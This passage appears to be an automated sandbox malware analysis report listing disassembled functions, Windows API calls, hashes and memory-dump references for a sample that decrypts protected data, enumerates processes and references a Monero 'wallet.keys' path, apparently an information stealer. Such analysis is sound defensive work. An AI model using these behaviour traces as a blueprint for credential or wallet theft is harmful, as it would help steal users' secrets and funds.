                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: /n}$`qc$v[,|$W[g$?_
                        • API String ID: 0-634233926
                        • Opcode ID: c001470919ba1c060d00167d040c490a8403906b051551d084d44cb41dbc8983
                        • Instruction ID: 5f40fd0525adf72bed0dda08f4ba659b5cfe3978cebeaf9f9bd7c942d53612e0
                        • Opcode Fuzzy Hash: c001470919ba1c060d00167d040c490a8403906b051551d084d44cb41dbc8983
                        • Instruction Fuzzy Hash: 0FB238F3A0C204AFE3046E2DEC8577ABBE9EB94720F1A453DEAC4C7744E93558058697
                        Function 00D6C27F Relevance: 7.8, Strings: 5, Instructions: 1559COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: <q8$6lU}$>uy$g^z$z'v/
                        • API String ID: 0-1217020870
                        • Opcode ID: 613e3b5ed3e49d2ec3ac05dc38c8183a475e8e5e4c6e803661a6305447fa21e1
                        • Instruction ID: ccc49dfbd93cc5008bbc3891f392efe88bba1c596d2729ec2312c97bcdf810db
                        • Opcode Fuzzy Hash: 613e3b5ed3e49d2ec3ac05dc38c8183a475e8e5e4c6e803661a6305447fa21e1
                        • Instruction Fuzzy Hash: D6B216F360C200AFE3046E2DEC8567ABBE5EF94720F16893DE6C4C7744EA3598058796
                        Function 0099C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0099C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0099C87C
                        • lstrcat.KERNEL32(?,009B0B46), ref: 0099C943
                        • lstrcat.KERNEL32(?,009B0B47), ref: 0099C957
                        • lstrcat.KERNEL32(?,009B0B4E), ref: 0099C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: fe015fed250e78c5ab918b16b928ca73a486ee56a400a33ea749084c3b4f757a
                        • Instruction ID: 46e25dda77f45a12a0abdf0c80063ae724782bddd656d0f30fb2e6cf926c97f0
                        • Opcode Fuzzy Hash: fe015fed250e78c5ab918b16b928ca73a486ee56a400a33ea749084c3b4f757a
                        • Instruction Fuzzy Hash: 12419EB590421ADFCF10CFA4DD89BEEF7B8BB88304F0041A9E509A7280DB745A84CF91
                        Function 00997240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0099724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00997254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00997281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009972A4
                        • LocalFree.KERNEL32(?), ref: 009972AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 55d35923f937a3f83977c34d81f856e36484652a76203365e8c62b8bc8e3b220
                        • Instruction ID: bbbef9aa25162f06e361271f0cf623b2aa9856a6d2b1f7c7316bbb35a4fc39f4
                        • Opcode Fuzzy Hash: 55d35923f937a3f83977c34d81f856e36484652a76203365e8c62b8bc8e3b220
                        • Instruction Fuzzy Hash: 7D010075A41208BBDB10DFD8CD55F9EB7B8AB44700F104555FB05AB2C0DA71AA009B65
                        Function 009A9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009A961E
                        • Process32First.KERNEL32(009B0ACA,00000128), ref: 009A9632
                        • Process32Next.KERNEL32(009B0ACA,00000128), ref: 009A9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 009A965C
                        • CloseHandle.KERNEL32(009B0ACA), ref: 009A967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: c3699c5e0872fabe9f1604b183ff0c4765d1be9995a496cd8d31bafc49622835
                        • Instruction ID: 8d95ef7c39cbd648d5d05afa614a85e2b9932d3c31f54b34f0bf4184e1913cf7
                        • Opcode Fuzzy Hash: c3699c5e0872fabe9f1604b183ff0c4765d1be9995a496cd8d31bafc49622835
                        • Instruction Fuzzy Hash: A7010C75A01208ABCB14DFA5CD58BEDB7F8FF48300F104199A905A7240EB759B40DF91
                        Function 00D671FC Relevance: 6.6, Strings: 4, Instructions: 1576COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: &$4s|}$$/$q[2
                        • API String ID: 0-3514446365
                        • Opcode ID: eb8c87c05631ded1fe1888584d25bdf1408d1e71fcb938346942aa38760322f2
                        • Instruction ID: cce83f4969bf0406630c5a516d12aae8655b35da5d729af9373583a0526367f6
                        • Opcode Fuzzy Hash: eb8c87c05631ded1fe1888584d25bdf1408d1e71fcb938346942aa38760322f2
                        • Instruction Fuzzy Hash: B4B215F390C2009FE304AE2DEC4567ABBE9EF94720F1A493DEAC4C7744E63599058697
                        Function 00D6DC82 Relevance: 6.5, Strings: 4, Instructions: 1534COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;?$O\?$cIw?$iT3~
                        • API String ID: 0-1291555467
                        • Opcode ID: affb787f4f219c96727a4c4b00d91af8bbacc913018ed364b715710e030676af
                        • Instruction ID: 1a6cf348e754418143813e81775e046a6ed7ca1096b9195b4c03e61e4c778c45
                        • Opcode Fuzzy Hash: affb787f4f219c96727a4c4b00d91af8bbacc913018ed364b715710e030676af
                        • Instruction Fuzzy Hash: ADA204F3A082009FE7046E2DEC8567ABBE5EFD4720F1A493DEAC4C7744E63598058697
                        Function 009A8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009B05B7), ref: 009A86CA
                        • Process32First.KERNEL32(?,00000128), ref: 009A86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 009A86F3
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • CloseHandle.KERNEL32(?), ref: 009A8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 1d558355ac15cdf8b4473a03bd43cd8e731aa92ad1c994908382683e3824f777
                        • Instruction ID: 8a36bd50ff18a768fe40f5feae5992d2b9fa621a22d881db3047cb1c9ab6c161
                        • Opcode Fuzzy Hash: 1d558355ac15cdf8b4473a03bd43cd8e731aa92ad1c994908382683e3824f777
                        • Instruction Fuzzy Hash: 21314871901218ABCB64EF54CC55FEEB778EB86700F1041A9F50AA21A0EF346E45CFE1
                        Function 009A8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00995184,40000001,00000000,00000000,?,00995184), ref: 009A8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: d3f1499cc4b83e4744465944cbacf0f2b92345b423ea0dad0e3c27d80f163a09
                        • Instruction ID: c538fef49faed54692bd5e7480a56a1cf2c3a5577a91b7e47a3f8a4841c468e2
                        • Opcode Fuzzy Hash: d3f1499cc4b83e4744465944cbacf0f2b92345b423ea0dad0e3c27d80f163a09
                        • Instruction Fuzzy Hash: DA111874200209FFDB40DF64D884FAB77A9AF8A300F109848FD198B250EB35EC41EBA0
                        Function 00999AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00994EEE,00000000,?), ref: 00999B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999B2A
                        • LocalFree.KERNEL32(?,?,?,?,00994EEE,00000000,?), ref: 00999B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: fd4a5cbb7a172b458fa8bc473659942e70f11801cbf58d2ebfdd42e48e0a843b
                        • Instruction ID: 26e0e1fbcd9b39ea55dc9c47ab444cfffc9b7819bbc3a02102523da75718f51f
                        • Opcode Fuzzy Hash: fd4a5cbb7a172b458fa8bc473659942e70f11801cbf58d2ebfdd42e48e0a843b
                        • Instruction Fuzzy Hash: 6811A4B4241208AFEB10CF64DCA5FAAB7B9FB89700F208059FD159B390D776A901DB50
                        Function 009A7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009B0E00,00000000,?), ref: 009A79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,009B0E00,00000000,?), ref: 009A79C4
                        • wsprintfA.USER32 ref: 009A79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 30cc015cfc45a3a3588e80a6aec22b7ebc7ae95cf75f0b7f85dac5faa5ebcfe8
                        • Instruction ID: f815de4d611dfb9c5104181f16d9a0dcfe3c73e7a37af2e124e63be5d8307d8e
                        • Opcode Fuzzy Hash: 30cc015cfc45a3a3588e80a6aec22b7ebc7ae95cf75f0b7f85dac5faa5ebcfe8
                        • Instruction Fuzzy Hash: 881115B2905118AACB149FC9DD55BBEFBF8EB48B11F10421AFA05A2280E6395940DBB1
                        Function 009A7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015BDAB8,00000000,?,009B0E10,00000000,?,00000000,00000000), ref: 009A7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015BDAB8,00000000,?,009B0E10,00000000,?,00000000,00000000,?), ref: 009A7A7D
                        • wsprintfA.USER32 ref: 009A7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
